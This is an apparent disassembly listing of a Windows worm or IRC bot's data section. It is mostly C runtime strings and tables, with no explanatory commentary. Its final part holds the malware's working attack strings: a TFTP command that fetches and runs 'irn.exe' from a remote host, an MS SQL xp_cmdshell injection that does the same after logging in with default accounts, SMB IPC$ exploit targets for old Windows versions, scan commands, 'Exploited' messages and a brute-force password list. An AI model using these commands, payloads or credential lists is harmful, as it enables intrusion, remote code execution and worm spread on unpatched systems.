dword_41DBC0 dd 6E6973h ; DATA XREF: sub_40A42B:loc_40A651�o
aModf db 'modf',0 ; DATA XREF: sub_40A42B:loc_40A645�o
align 4
aFloor db 'floor',0 ; DATA XREF: sub_40A42B:loc_40A639�o
align 4
aCeil db 'ceil',0 ; DATA XREF: sub_40A42B:loc_40A630�o
align 4
aAtan db 'atan',0 ; DATA XREF: sub_40A42B:loc_40A627�o
align 4
aExp10 db 'exp10',0 ; DATA XREF: sub_40A42B+1BF�o
align 10h
dbl_41DBF0 dq 1.0 ; DATA XREF: sub_40A6EF+6D�r
aAcos db 'acos',0 ; DATA XREF: sub_40A42B:loc_40A5AE�o
align 10h
aAsin db 'asin',0 ; DATA XREF: sub_40A42B:loc_40A5A5�o
align 4
aLog db 'log',0 ; DATA XREF: sub_40A42B:loc_40A568�o
; sub_40A42B+149�o ...
aLog10 db 'log10',0 ; DATA XREF: sub_40A42B:loc_40A541�o
; sub_40A42B+131�o ...
align 4
aExp db 'exp',0 ; DATA XREF: sub_40A42B:loc_40A508�o
; sub_40A42B+10D�o ...
aPow db 'pow',0 ; DATA XREF: sub_40A42B:loc_40A4D3�o
; sub_40A42B:loc_40A580�o ...
off_41DC1C dd offset sub_40B3C2 ; DATA XREF: sub_406640+F1�r
; sub_406640+FA�o ...
dd offset dword_420E34
off_41DC24 dd offset sub_40B1DA ; DATA XREF: sub_40B1CF�o sub_40B1DA+3�o ...
dd offset sub_402CE0
aBadException db 'bad exception',0 ; DATA XREF: sub_40BA07+156�o
align 4
dword_41DC3C dd 41h dup(0) ; DATA XREF: sub_40BF57+25�o
; sub_40C33C+27�o
asc_41DD40: ; DATA XREF: .data:off_423668�o
; .data:00423E70�o
unicode 0, < ((((( H>
dw 10h
dd 7 dup(100010h), 5 dup(840084h), 3 dup(100010h), 810010h
dd 2 dup(810081h), 10081h, 9 dup(10001h), 100001h, 2 dup(100010h)
dd 820010h, 2 dup(820082h), 20082h, 9 dup(20002h), 100002h
dd 100010h, 200010h, 40h dup(0)
dword_41DF40 dd 200000h, 4 dup(200020h), 280068h, 280028h, 200028h
; DATA XREF: .data:00423E74�o
; .data:00423590�o
dd 8 dup(200020h), 480020h, 7 dup(100010h), 840010h, 4 dup(840084h)
dd 100084h, 3 dup(100010h), 3 dup(1810181h), 0Ah dup(1010101h)
dd 3 dup(100010h), 3 dup(1820182h), 0Ah dup(1020102h)
dd 2 dup(100010h), 10h dup(200020h), 480020h, 8 dup(100010h)
dd 140010h, 100014h, 2 dup(100010h), 100014h, 2 dup(100010h)
dd 1010010h, 0Bh dup(1010101h), 1010010h, 3 dup(1010101h)
dd 0Ch dup(1020102h), 1020010h, 3 dup(1020102h), 1010102h
dd 0
dword_41E148 dd 83828180h, 87868584h, 8B8A8988h, 8F8E8D8Ch, 93929190h
dd 97969594h, 9B9A9998h, 9F9E9D9Ch, 0A3A2A1A0h, 0A7A6A5A4h
dd 0ABAAA9A8h, 0AFAEADACh, 0B3B2B1B0h, 0B7B6B5B4h, 0BBBAB9B8h
dd 0BFBEBDBCh, 0C3C2C1C0h, 0C7C6C5C4h, 0CBCAC9C8h, 0CFCECDCCh
dd 0D3D2D1D0h, 0D7D6D5D4h, 0DBDAD9D8h, 0DFDEDDDCh, 0E3E2E1E0h
dd 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h, 0F7F6F5F4h
dd 0FBFAF9F8h, 0FFFEFDFCh, 3020100h, 7060504h, 0B0A0908h
dd 0F0E0D0Ch, 13121110h, 17161514h, 1B1A1918h, 1F1E1D1Ch
dd 23222120h, 27262524h, 2B2A2928h, 2F2E2D2Ch, 33323130h
dd 37363534h, 3B3A3938h, 3F3E3D3Ch, 63626140h, 67666564h
dd 6B6A6968h, 6F6E6D6Ch, 73727170h, 77767574h, 5B7A7978h
dd 5F5E5D5Ch, 63626160h, 67666564h, 6B6A6968h, 6F6E6D6Ch
dd 73727170h, 77767574h, 7B7A7978h, 7F7E7D7Ch, 83828180h
dd 87868584h, 8B8A8988h, 8F8E8D8Ch, 93929190h, 97969594h
dd 9B9A9998h, 9F9E9D9Ch, 0A3A2A1A0h, 0A7A6A5A4h, 0ABAAA9A8h
dd 0AFAEADACh, 0B3B2B1B0h, 0B7B6B5B4h, 0BBBAB9B8h, 0BFBEBDBCh
dd 0C3C2C1C0h, 0C7C6C5C4h, 0CBCAC9C8h, 0CFCECDCCh, 0D3D2D1D0h
dd 0D7D6D5D4h, 0DBDAD9D8h, 0DFDEDDDCh, 0E3E2E1E0h, 0E7E6E5E4h
dd 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h, 0F7F6F5F4h, 0FBFAF9F8h
dd 0FFFEFDFCh, 83828180h, 87868584h, 8B8A8988h, 8F8E8D8Ch
dd 93929190h, 97969594h, 9B9A9998h, 9F9E9D9Ch, 0A3A2A1A0h
dd 0A7A6A5A4h, 0ABAAA9A8h, 0AFAEADACh, 0B3B2B1B0h, 0B7B6B5B4h
dd 0BBBAB9B8h, 0BFBEBDBCh, 0C3C2C1C0h, 0C7C6C5C4h, 0CBCAC9C8h
dd 0CFCECDCCh, 0D3D2D1D0h, 0D7D6D5D4h, 0DBDAD9D8h, 0DFDEDDDCh
dd 0E3E2E1E0h, 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h
dd 0F7F6F5F4h, 0FBFAF9F8h, 0FFFEFDFCh, 3020100h, 7060504h
dd 0B0A0908h, 0F0E0D0Ch, 13121110h, 17161514h, 1B1A1918h
dd 1F1E1D1Ch, 23222120h, 27262524h, 2B2A2928h, 2F2E2D2Ch
dd 33323130h, 37363534h, 3B3A3938h, 3F3E3D3Ch, 43424140h
dd 47464544h, 4B4A4948h, 4F4E4D4Ch, 53525150h, 57565554h
dd 5B5A5958h, 5F5E5D5Ch, 43424160h, 47464544h, 4B4A4948h
dd 4F4E4D4Ch, 53525150h, 57565554h, 7B5A5958h, 7F7E7D7Ch
dd 83828180h, 87868584h, 8B8A8988h, 8F8E8D8Ch, 93929190h
dd 97969594h, 9B9A9998h, 9F9E9D9Ch, 0A3A2A1A0h, 0A7A6A5A4h
dd 0ABAAA9A8h, 0AFAEADACh, 0B3B2B1B0h, 0B7B6B5B4h, 0BBBAB9B8h
dd 0BFBEBDBCh, 0C3C2C1C0h, 0C7C6C5C4h, 0CBCAC9C8h, 0CFCECDCCh
dd 0D3D2D1D0h, 0D7D6D5D4h, 0DBDAD9D8h, 0DFDEDDDCh, 0E3E2E1E0h
dd 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h, 0F7F6F5F4h
dd 0FBFAF9F8h, 0FFFEFDFCh, 6D3A4848h, 73733A6Dh, 0
aDdddMmmmDdYyyy db 'dddd, MMMM dd, yyyy',0 ; DATA XREF: .data:00423F1C�o
aMmDdYy db 'MM/dd/yy',0 ; DATA XREF: .data:00423F18�o
align 4
aPm db 'PM',0 ; DATA XREF: .data:00423F14�o
align 4
aAm db 'AM',0 ; DATA XREF: .data:00423F10�o
align 4
aDecember db 'December',0 ; DATA XREF: .data:00423F0C�o
align 4
aNovember db 'November',0 ; DATA XREF: .data:00423F08�o
align 4
aOctober db 'October',0 ; DATA XREF: .data:00423F04�o
aSeptember db 'September',0 ; DATA XREF: .data:00423F00�o
align 4
aAugust db 'August',0 ; DATA XREF: .data:00423EFC�o
align 10h
aJuly db 'July',0 ; DATA XREF: .data:00423EF8�o
align 4
aJune db 'June',0 ; DATA XREF: .data:00423EF4�o
align 10h
aApril db 'April',0 ; DATA XREF: .data:00423EEC�o
align 4
aMarch db 'March',0 ; DATA XREF: .data:00423EE8�o
align 10h
aFebruary db 'February',0 ; DATA XREF: .data:00423EE4�o
align 4
aJanuary db 'January',0 ; DATA XREF: .data:00423EE0�o
aDec db 'Dec',0 ; DATA XREF: .data:00423EDC�o
aNov db 'Nov',0 ; DATA XREF: .data:00423ED8�o
aOct db 'Oct',0 ; DATA XREF: .data:00423ED4�o
aSep db 'Sep',0 ; DATA XREF: .data:00423ED0�o
aAug db 'Aug',0 ; DATA XREF: .data:00423ECC�o
aJul db 'Jul',0 ; DATA XREF: .data:00423EC8�o
aJun db 'Jun',0 ; DATA XREF: .data:00423EC4�o
aMay db 'May',0 ; DATA XREF: .data:00423EC0�o
; .data:00423EF0�o
aApr db 'Apr',0 ; DATA XREF: .data:00423EBC�o
aMar db 'Mar',0 ; DATA XREF: .data:00423EB8�o
aFeb db 'Feb',0 ; DATA XREF: .data:00423EB4�o
aJan db 'Jan',0 ; DATA XREF: .data:00423EB0�o
aSaturday db 'Saturday',0 ; DATA XREF: .data:00423EAC�o
align 10h
aFriday db 'Friday',0 ; DATA XREF: .data:00423EA8�o
align 4
aThursday db 'Thursday',0 ; DATA XREF: .data:00423EA4�o
align 4
aWednesday db 'Wednesday',0 ; DATA XREF: .data:00423EA0�o
align 10h
aTuesday db 'Tuesday',0 ; DATA XREF: .data:00423E9C�o
aMonday db 'Monday',0 ; DATA XREF: .data:00423E98�o
align 10h
aSunday db 'Sunday',0 ; DATA XREF: .data:00423E94�o
align 4
aSat db 'Sat',0 ; DATA XREF: .data:00423E90�o
aFri db 'Fri',0 ; DATA XREF: .data:00423E8C�o
aThu db 'Thu',0 ; DATA XREF: .data:00423E88�o
aWed db 'Wed',0 ; DATA XREF: .data:00423E84�o
aTue db 'Tue',0 ; DATA XREF: .data:00423E80�o
aMon db 'Mon',0 ; DATA XREF: .data:00423E7C�o
aSun db 'Sun',0 ; DATA XREF: .data:off_423E78�o
aInitializecrit db 'InitializeCriticalSectionAndSpinCount',0 ; DATA XREF: sub_40CB14+53�o
align 4
aKernel32_dll_0 db 'kernel32.dll',0 ; DATA XREF: sub_40CB14+44�o
align 4
aCompleteObject db ' Complete Object Locator',27h,0 ; DATA XREF: .rdata:0041EB84�o
align 4
aClassHierarchy db ' Class Hierarchy Descriptor',27h,0 ; DATA XREF: .rdata:0041EB80�o
align 4
aBaseClassArray db ' Base Class Array',27h,0 ; DATA XREF: .rdata:0041EB7C�o
align 4
aBaseClassDescr db ' Base Class Descriptor at (',0 ; DATA XREF: .rdata:0041EB78�o
aTypeDescriptor db ' Type Descriptor',27h,0 ; DATA XREF: .rdata:0041EB74�o
align 4
aLocalStaticThr db '`local static thread guard',27h,0 ; DATA XREF: .rdata:0041ECC0�o
aManagedVectorC db '`managed vector copy constructor iterator',27h,0
; DATA XREF: .rdata:0041ECBC�o
align 4
aVectorVbaseCop db '`vector vbase copy constructor iterator',27h,0
; DATA XREF: .rdata:0041ECB8�o
align 10h
aVectorCopyCons db '`vector copy constructor iterator',27h,0 ; DATA XREF: .rdata:0041ECB4�o
align 4
aDynamicAtexitD db '`dynamic atexit destructor for ',27h,0 ; DATA XREF: .rdata:0041ECB0�o
align 4
aDynamicInitial db '`dynamic initializer for ',27h,0 ; DATA XREF: .rdata:0041ECAC�o
align 4
aEhVectorVbaseC db '`eh vector vbase copy constructor iterator',27h,0
; DATA XREF: .rdata:0041ECA8�o
aEhVectorCopyCo db '`eh vector copy constructor iterator',27h,0
; DATA XREF: .rdata:0041ECA4�o
align 4
aManagedVectorD db '`managed vector destructor iterator',27h,0 ; DATA XREF: .rdata:0041ECA0�o
align 10h
aManagedVecto_0 db '`managed vector constructor iterator',27h,0
; DATA XREF: .rdata:0041EC9C�o
align 4
aPlacementDelet db '`placement delete[] closure',27h,0 ; DATA XREF: .rdata:0041EC98�o
align 4
aPlacementDel_0 db '`placement delete closure',27h,0 ; DATA XREF: .rdata:0041EC94�o
align 4
aOmniCallsig db '`omni callsig',27h,0 ; DATA XREF: .rdata:0041EC90�o
align 4
aDelete db ' delete[]',0 ; DATA XREF: .rdata:0041EC8C�o
align 10h
aNew db ' new[]',0 ; DATA XREF: .rdata:0041EC88�o
align 4
aLocalVftableCo db '`local vftable constructor closure',27h,0 ; DATA XREF: .rdata:0041EC84�o
aLocalVftable db '`local vftable',27h,0 ; DATA XREF: .rdata:0041EC80�o
aRtti db '`RTTI',0 ; DATA XREF: .rdata:0041EC7C�o
align 4
aEh db '`EH',0 ; DATA XREF: .rdata:0041EC78�o
aUdtReturning db '`udt returning',27h,0 ; DATA XREF: .rdata:0041EC74�o
aCopyConstructo db '`copy constructor closure',27h,0 ; DATA XREF: .rdata:0041EC70�o
align 4
aEhVectorVbas_0 db '`eh vector vbase constructor iterator',27h,0
; DATA XREF: .rdata:0041EC6C�o
align 4
aEhVectorDestru db '`eh vector destructor iterator',27h,0 ; DATA XREF: .rdata:0041EC68�o
aEhVectorConstr db '`eh vector constructor iterator',27h,0 ; DATA XREF: .rdata:0041EC64�o
align 10h
aVirtualDisplac db '`virtual displacement map',27h,0 ; DATA XREF: .rdata:0041EC60�o
align 4
aVectorVbaseCon db '`vector vbase constructor iterator',27h,0 ; DATA XREF: .rdata:0041EC5C�o
aVectorDestruct db '`vector destructor iterator',27h,0 ; DATA XREF: .rdata:0041EC58�o
align 10h
aVectorConstruc db '`vector constructor iterator',27h,0 ; DATA XREF: .rdata:0041EC54�o
align 10h
aScalarDeleting db '`scalar deleting destructor',27h,0 ; DATA XREF: .rdata:0041EC50�o
align 10h
aDefaultConstru db '`default constructor closure',27h,0 ; DATA XREF: .rdata:0041EC4C�o
align 10h
aVectorDeleting db '`vector deleting destructor',27h,0 ; DATA XREF: .rdata:0041EC48�o
align 10h
aVbaseDestructo db '`vbase destructor',27h,0 ; DATA XREF: .rdata:0041EC44�o
align 4
aString db '`string',27h,0 ; DATA XREF: .rdata:0041EC40�o
align 10h
aLocalStaticGua db '`local static guard',27h,0 ; DATA XREF: .rdata:0041EC3C�o
align 4
aTypeof db '`typeof',27h,0 ; DATA XREF: .rdata:0041EC38�o
align 4
aVcall db '`vcall',27h,0 ; DATA XREF: .rdata:0041EC34�o
aVbtable db '`vbtable',27h,0 ; DATA XREF: .rdata:0041EC30�o
align 4
aVftable db '`vftable',27h,0 ; DATA XREF: .rdata:0041EC2C�o
align 4
asc_41EA24 db '^=',0 ; DATA XREF: .rdata:0041EC28�o
align 4
asc_41EA28 db '|=',0 ; DATA XREF: .rdata:0041EC24�o
align 4
asc_41EA2C db '&=',0 ; DATA XREF: .rdata:0041EC20�o
align 10h
asc_41EA30 db '<<=',0 ; DATA XREF: .rdata:0041EC1C�o
asc_41EA34 db '>>=',0 ; DATA XREF: .rdata:0041EC18�o
asc_41EA38 db '%=',0 ; DATA XREF: .rdata:0041EC14�o
align 4
asc_41EA3C db '/=',0 ; DATA XREF: .rdata:0041EC10�o
align 10h
asc_41EA40 db '-=',0 ; DATA XREF: .rdata:0041EC0C�o
align 4
asc_41EA44 db '+=',0 ; DATA XREF: .rdata:0041EC08�o
align 4
asc_41EA48 db '*=',0 ; DATA XREF: .rdata:0041EC04�o
align 4
asc_41EA4C db '||',0 ; DATA XREF: .rdata:0041EC00�o
align 10h
asc_41EA50 db '&&',0 ; DATA XREF: .rdata:0041EBFC�o
align 4
asc_41EA54: ; DATA XREF: .rdata:0041EBF8�o
unicode 0, <|>,0
asc_41EA58: ; DATA XREF: .rdata:0041EBF4�o
unicode 0, <^>,0
asc_41EA5C: ; DATA XREF: .rdata:0041EBF0�o
unicode 0, <~>,0
asc_41EA60 db '()',0 ; DATA XREF: .rdata:0041EBEC�o
align 4
asc_41EA64: ; DATA XREF: .rdata:0041EBE8�o
unicode 0, <,>,0
asc_41EA68 db '>=',0 ; DATA XREF: .rdata:0041EBE4�o
align 4
asc_41EA6C: ; DATA XREF: .rdata:0041EBE0�o
dw 3Eh
unicode 0, <>,0
asc_41EA70 db '<=',0 ; DATA XREF: .rdata:0041EBDC�o
align 4
asc_41EA74: ; DATA XREF: .rdata:0041EBD8�o
dw 3Ch
unicode 0, <>,0
asc_41EA78: ; DATA XREF: .rdata:0041EBD4�o
unicode 0, <%>,0
asc_41EA7C: ; DATA XREF: .rdata:0041EBD0�o
unicode 0, </>,0
asc_41EA80 db '->*',0 ; DATA XREF: .rdata:0041EBCC�o
asc_41EA84: ; DATA XREF: .rdata:0041EBC8�o
unicode 0, <&>,0
asc_41EA88: ; DATA XREF: .rdata:0041EBC4�o
unicode 0, <+>,0
asc_41EA8C: ; DATA XREF: .rdata:0041EBC0�o
unicode 0, <->,0
asc_41EA90 db '--',0 ; DATA XREF: .rdata:0041EBBC�o
align 4
asc_41EA94 db '++',0 ; DATA XREF: .rdata:0041EBB8�o
align 4
asc_41EA98: ; DATA XREF: .rdata:0041EBB4�o
unicode 0, <*>,0
asc_41EA9C db '->',0 ; DATA XREF: .rdata:0041EBB0�o
align 10h
aOperator db 'operator',0 ; DATA XREF: .rdata:0041EBAC�o
align 4
asc_41EAAC db '[]',0 ; DATA XREF: .rdata:0041EBA8�o
align 10h
asc_41EAB0 db '!=',0 ; DATA XREF: .rdata:0041EBA4�o
align 4
asc_41EAB4 db '==',0 ; DATA XREF: .rdata:0041EBA0�o
align 4
asc_41EAB8: ; DATA XREF: .rdata:0041EB9C�o
unicode 0, <!>,0
asc_41EABC db '<<',0 ; DATA XREF: .rdata:0041EB98�o
align 10h
asc_41EAC0 db '>>',0 ; DATA XREF: .rdata:0041EB94�o
align 4
aDelete_0 db ' delete',0 ; DATA XREF: .rdata:0041EB8C�o
aNew_0 db ' new',0 ; DATA XREF: .rdata:0041EB88�o
align 4
a__unaligned db '__unaligned',0 ; DATA XREF: .rdata:0041EB6C�o
a__restrict db '__restrict',0 ; DATA XREF: .rdata:0041EB68�o
align 4
; a__ptr64
a__ptr64 db '__ptr64',0 ; DATA XREF: .rdata:0041EB64�o
a__clrcall db '__clrcall',0 ; DATA XREF: .rdata:0041EB60�o
align 10h
a__fastcall db '__fastcall',0 ; DATA XREF: .rdata:0041EB5C�o
align 4
a__thiscall db '__thiscall',0 ; DATA XREF: .rdata:0041EB58�o
align 4
a__stdcall db '__stdcall',0 ; DATA XREF: .rdata:0041EB54�o
align 4
a__pascal db '__pascal',0 ; DATA XREF: .rdata:0041EB50�o
align 10h
a__cdecl db '__cdecl',0 ; DATA XREF: .rdata:0041EB4C�o
a__based db '__based(',0 ; DATA XREF: .rdata:0041EB48�o
align 8
dd offset a__based ; "__based("
dd offset a__cdecl ; "__cdecl"
dd offset a__pascal ; "__pascal"
dd offset a__stdcall ; "__stdcall"
dd offset a__thiscall ; "__thiscall"
dd offset a__fastcall ; "__fastcall"
dd offset a__clrcall ; "__clrcall"
dd offset a__ptr64 ; "__ptr64"
dd offset a__restrict ; "__restrict"
dd offset a__unaligned ; "__unaligned"
dd offset word_41D482
dd offset aTypeDescriptor ; " Type Descriptor'"
dd offset aBaseClassDescr ; " Base Class Descriptor at ("
dd offset aBaseClassArray ; " Base Class Array'"
dd offset aClassHierarchy ; " Class Hierarchy Descriptor'"
dd offset aCompleteObject ; " Complete Object Locator'"
dd offset aNew_0 ; " new"
dd offset aDelete_0 ; " delete"
dd offset byte_41D480
dd offset asc_41EAC0 ; ">>"
dd offset asc_41EABC ; "<<"
dd offset asc_41EAB8 ; "!"
dd offset asc_41EAB4 ; "=="
dd offset asc_41EAB0 ; "!="
dd offset asc_41EAAC ; "[]"
dd offset aOperator ; "operator"
dd offset asc_41EA9C ; "->"
dd offset asc_41EA98 ; "*"
dd offset asc_41EA94 ; "++"
dd offset asc_41EA90 ; "--"
dd offset asc_41EA8C ; "-"
dd offset asc_41EA88 ; "+"
dd offset asc_41EA84 ; "&"
dd offset asc_41EA80 ; "->*"
dd offset asc_41EA7C ; "/"
dd offset asc_41EA78 ; "%"
dd offset asc_41EA74 ; "<"
dd offset asc_41EA70 ; "<="
dd offset asc_41EA6C ; ">"
dd offset asc_41EA68 ; ">="
dd offset asc_41EA64 ; ","
dd offset asc_41EA60 ; "()"
dd offset asc_41EA5C ; "~"
dd offset asc_41EA58 ; "^"
dd offset asc_41EA54 ; "|"
dd offset asc_41EA50 ; "&&"
dd offset asc_41EA4C ; "||"
dd offset asc_41EA48 ; "*="
dd offset asc_41EA44 ; "+="
dd offset asc_41EA40 ; "-="
dd offset asc_41EA3C ; "/="
dd offset asc_41EA38 ; "%="
dd offset asc_41EA34 ; ">>="
dd offset asc_41EA30 ; "<<="
dd offset asc_41EA2C ; "&="
dd offset asc_41EA28 ; "|="
dd offset asc_41EA24 ; "^="
dd offset aVftable ; "`vftable'"
dd offset aVbtable ; "`vbtable'"
dd offset aVcall ; "`vcall'"
dd offset aTypeof ; "`typeof'"
dd offset aLocalStaticGua ; "`local static guard'"
dd offset aString ; "`string'"
dd offset aVbaseDestructo ; "`vbase destructor'"
dd offset aVectorDeleting ; "`vector deleting destructor'"
dd offset aDefaultConstru ; "`default constructor closure'"
dd offset aScalarDeleting ; "`scalar deleting destructor'"
dd offset aVectorConstruc ; "`vector constructor iterator'"
dd offset aVectorDestruct ; "`vector destructor iterator'"
dd offset aVectorVbaseCon ; "`vector vbase constructor iterator'"
dd offset aVirtualDisplac ; "`virtual displacement map'"
dd offset aEhVectorConstr ; "`eh vector constructor iterator'"
dd offset aEhVectorDestru ; "`eh vector destructor iterator'"
dd offset aEhVectorVbas_0 ; "`eh vector vbase constructor iterator'"
dd offset aCopyConstructo ; "`copy constructor closure'"
dd offset aUdtReturning ; "`udt returning'"
dd offset aEh ; "`EH"
dd offset aRtti ; "`RTTI"
dd offset aLocalVftable ; "`local vftable'"
dd offset aLocalVftableCo ; "`local vftable constructor closure'"
dd offset aNew ; " new[]"
dd offset aDelete ; " delete[]"
dd offset aOmniCallsig ; "`omni callsig'"
dd offset aPlacementDel_0 ; "`placement delete closure'"
dd offset aPlacementDelet ; "`placement delete[] closure'"
dd offset aManagedVecto_0 ; "`managed vector constructor iterator'"
dd offset aManagedVectorD ; "`managed vector destructor iterator'"
dd offset aEhVectorCopyCo ; "`eh vector copy constructor iterator'"
dd offset aEhVectorVbaseC ; "`eh vector vbase copy constructor itera"...
dd offset aDynamicInitial ; "`dynamic initializer for '"
dd offset aDynamicAtexitD ; "`dynamic atexit destructor for '"
dd offset aVectorCopyCons ; "`vector copy constructor iterator'"
dd offset aVectorVbaseCop ; "`vector vbase copy constructor iterator"...
dd offset aManagedVectorC ; "`managed vector copy constructor iterat"...
dd offset aLocalStaticThr ; "`local static thread guard'"
dd offset word_41D482
dd 86808006h, 808180h, 86031000h, 80828680h, 45050514h
dd 85854545h, 585h, 50803030h, 8008880h, 38272800h, 805750h
dd 30370007h, 88505030h, 20000000h, 80888028h, 80h
aHHhhXppwpp db '`h`hhh',8,8,7,'xppwpp',8,8,0
dw 800h
dd 7000800h, 8
aGetprocesswind db 'GetProcessWindowStation',0 ; DATA XREF: sub_40F524+C1�o
aGetuserobjecti db 'GetUserObjectInformationA',0 ; DATA XREF: sub_40F524+A9�o
align 4
aGetlastactivep db 'GetLastActivePopup',0 ; DATA XREF: sub_40F524+6D�o
align 4
aGetactivewindo db 'GetActiveWindow',0 ; DATA XREF: sub_40F524+58�o
aMessageboxa db 'MessageBoxA',0 ; DATA XREF: sub_40F524+46�o
aUser32_dll db 'USER32.DLL',0 ; DATA XREF: sub_40F524+28�o
align 4
off_41ED94 dd offset sub_40F76B ; DATA XREF: sub_407979�r sub_407979+9�o ...
dd offset nullsub_2
dd offset nullsub_2
a_nextafter db '_nextafter',0
align 4
a_logb db '_logb',0
align 4
a_yn db '_yn',0
a_y1 db '_y1',0
a_y0 db '_y0',0
aFrexp db 'frexp',0
align 4
aFmod db 'fmod',0
align 10h
a_hypot db '_hypot',0
align 4
a_cabs db '_cabs',0
align 10h
aLdexp db 'ldexp',0
align 4
aFabs db 'fabs',0
align 10h
aSqrt db 'sqrt',0
align 4
aAtan2 db 'atan2',0
align 10h
aTanh db 'tanh',0
align 4
aCosh db 'cosh',0
align 10h
aSinh db 'sinh',0
align 4
dbl_41EE18 dq 0.0 ; DATA XREF: sub_40FB20+143�r
aSunmontuewedth db 'SunMonTueWedThuFriSat',0
align 4
aJanfebmaraprma db 'JanFebMarAprMayJunJulAugSepOctNovDec',0
align 10h
aE000 db 'e+000',0 ; DATA XREF: sub_410A54:loc_410B2C�o
align 4
dbl_41EE68 dq 4.195835e6 ; DATA XREF: sub_411394+F�r
dbl_41EE70 dq 3.145727e6 ; DATA XREF: sub_411394+6�r
aIsprocessorfea db 'IsProcessorFeaturePresent',0 ; DATA XREF: sub_4113D0+F�o
align 4
aKernel32 db 'KERNEL32',0 ; DATA XREF: sub_4113D0�o
align 10h
aConout db 'CONOUT$',0 ; DATA XREF: sub_41142B+E�o
a1Qnan db '1#QNAN',0 ; DATA XREF: sub_412AB1:loc_412BE0�o
align 10h
a1Inf db '1#INF',0 ; DATA XREF: sub_412AB1+103�o
align 4
a1Ind db '1#IND',0 ; DATA XREF: sub_412AB1+F4�o
align 10h
a1Snan db '1#SNAN',0 ; DATA XREF: sub_412AB1+DC�o
align 4
aBadAllocatio_0 db 'bad allocation',0 ; DATA XREF: .data:00424520�o
align 4
aScan_start db 'scan.start',0 ; DATA XREF: sub_41C370+D5�o
align 4
aScan_stop db 'scan.stop',0 ; DATA XREF: sub_41C370+F1�o
byte_41EEEE db 0 ; DATA XREF: sub_41A9DE+9C�o
byte_41EEEF db 0 ; DATA XREF: sub_41A9DE+A8�o
aScan_stats db 'scan.stats',0 ; DATA XREF: sub_41C370+10D�o
align 4
aD_D_D_D db '%d.%d.%d.%d',0 ; DATA XREF: sub_413A2D+4A�o
aS db '%s',0 ; DATA XREF: sub_413A2D+18C�o
byte_41EF0B db 0 ; DATA XREF: .data:off_424650�o
aS_0 db '%s',0 ; DATA XREF: sub_413A2D+29C�o
byte_41EF0F db 0 ; DATA XREF: sub_41B925+1DD�o
aS_1 db '%s',0 ; DATA XREF: sub_413A2D+386�o
align 4
aS_2 db '%s',0 ; DATA XREF: sub_413A2D+495�o
byte_41EF17 db 0 ; DATA XREF: .text:loc_41C061�o
aBadAllocatio_1 db 'bad allocation',0 ; DATA XREF: .data:00424524�o
align 4
aTftpISGetIrn_e db 'tftp -i %s GET irn.exe&start irn.exe&exit',0Dh,0Ah,0
aBadAllocatio_2 db 'bad allocation',0 ; DATA XREF: .data:004245D8�o
align 4
dword_41EF64 dd 5C0D0A00h ; DATA XREF: sub_41A5C1+1F�r
dword_41EF68 dd 2E2F5Fh ; DATA XREF: sub_41A5C1+27�r
dword_41EF6C dd 0 ; DATA XREF: sub_41A5C1+2C�o
dword_41EF70 dd 0 ; DATA XREF: sub_41A5C1+51�o
aHttpSDS_0 db 'http://%s:%d/%s',0 ; DATA XREF: sub_41A5C1+F1�o
aHttpSDS_1 db 'http://%s:%d/%s',0 ; DATA XREF: sub_41A5C1+162�o
aBadAllocatio_3 db 'bad allocation',0
align 4
aWindowsNt42000 db 'Windows NT4, 2000 (SP0-SP4)',0
aWindowsXpSp0Sp db 'Windows XP (SP0+SP1)',0 ; DATA XREF: .data:00424634�o
align 4
aIpc:
unicode 0, <\IPC$>,0
unicode 0, <\\>,0
align 4
dd 2 dup(0)
aIpc_0:
unicode 0, <\IPC$>,0
unicode 0, <\\>,0
align 4
a_: ; DATA XREF: sub_41A9DE+57�o
unicode 0, <.>,0
aSIpc db '\\%s\ipc$',0 ; DATA XREF: sub_41A9DE+76�o
align 4
aSPipeBrowser db '\\%s\pipe\browser',0 ; DATA XREF: sub_41A9DE+CA�o
align 4
dword_41F02C dd 4B324FC8h, 1D31670h, 475A7812h, 88E16EBFh, 0 ; DATA XREF: sub_41A9DE+191�o
dword_41F040 dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 3 dup(0)
; DATA XREF: sub_41A9DE+1AC�o
dd 2EBh, 0
aHttpSDS_2 db 'http://%s:%d/%s',0 ; DATA XREF: sub_41A9DE+3D3�o
aHttpSDS_3 db 'http://%s:%d/%s',0 ; DATA XREF: sub_41A9DE+451�o
aSExploitedS_ db '%s: Exploited: %s.',0 ; DATA XREF: sub_41A9DE+786�o
align 4
aBadAllocatio_4 db 'bad allocation',0 ; DATA XREF: .data:00424648�o
align 4
aSa db 'sa',0 ; DATA XREF: sub_41B1A0+55�o
align 4
aRoot db 'root',0 ; DATA XREF: sub_41B1A0+5C�o
align 4
aAdmin db 'admin',0 ; DATA XREF: sub_41B1A0+63�o
align 4
aDriverSqlServe db 'DRIVER={SQL Server};SERVER=%s,%d;UID=%s;PWD=%s;%s',0
; DATA XREF: sub_41B1A0+10C�o
align 10h
; aExecMaster(long long, *)
aExecMaster__xp db 'EXEC master..xp_cmdshell ',27h,'tftp -i %s GET irn.exe&start irn.exe'
; DATA XREF: sub_41B1A0+197�o
db '&exit',0Dh,0Ah
db 27h,0
align 4
aSExploitedS__0 db '%s: Exploited %s.',0 ; DATA XREF: sub_41B1A0+1F1�o
align 4
aAdministrator db 'administrator',0 ; DATA XREF: .data:00424654�o
align 4
aAdministrador db 'administrador',0 ; DATA XREF: .data:00424658�o
align 4
aAdministrateur db 'administrateur',0 ; DATA XREF: .data:0042465C�o
align 4
aAdministrat db 'administrat',0 ; DATA XREF: .data:00424660�o
aAdmins db 'admins',0 ; DATA XREF: .data:00424664�o
align 10h
aAdmin_0 db 'admin',0 ; DATA XREF: .data:00424668�o
align 4
aAdm db 'adm',0 ; DATA XREF: .data:0042466C�o
aPassword1 db 'password1',0 ; DATA XREF: .data:00424670�o
align 4
aPassword db 'password',0 ; DATA XREF: .data:00424674�o
align 4
aPasswd db 'passwd',0 ; DATA XREF: .data:00424678�o
align 4
aPass1234 db 'pass1234',0 ; DATA XREF: .data:0042467C�o
align 4
aPass db 'pass',0 ; DATA XREF: .data:00424680�o
align 10h
aPwd db 'pwd',0 ; DATA XREF: .data:00424684�o
a007 db '007',0 ; DATA XREF: .data:00424688�o
a1: ; DATA XREF: .data:0042468C�o
unicode 0, <1>,0
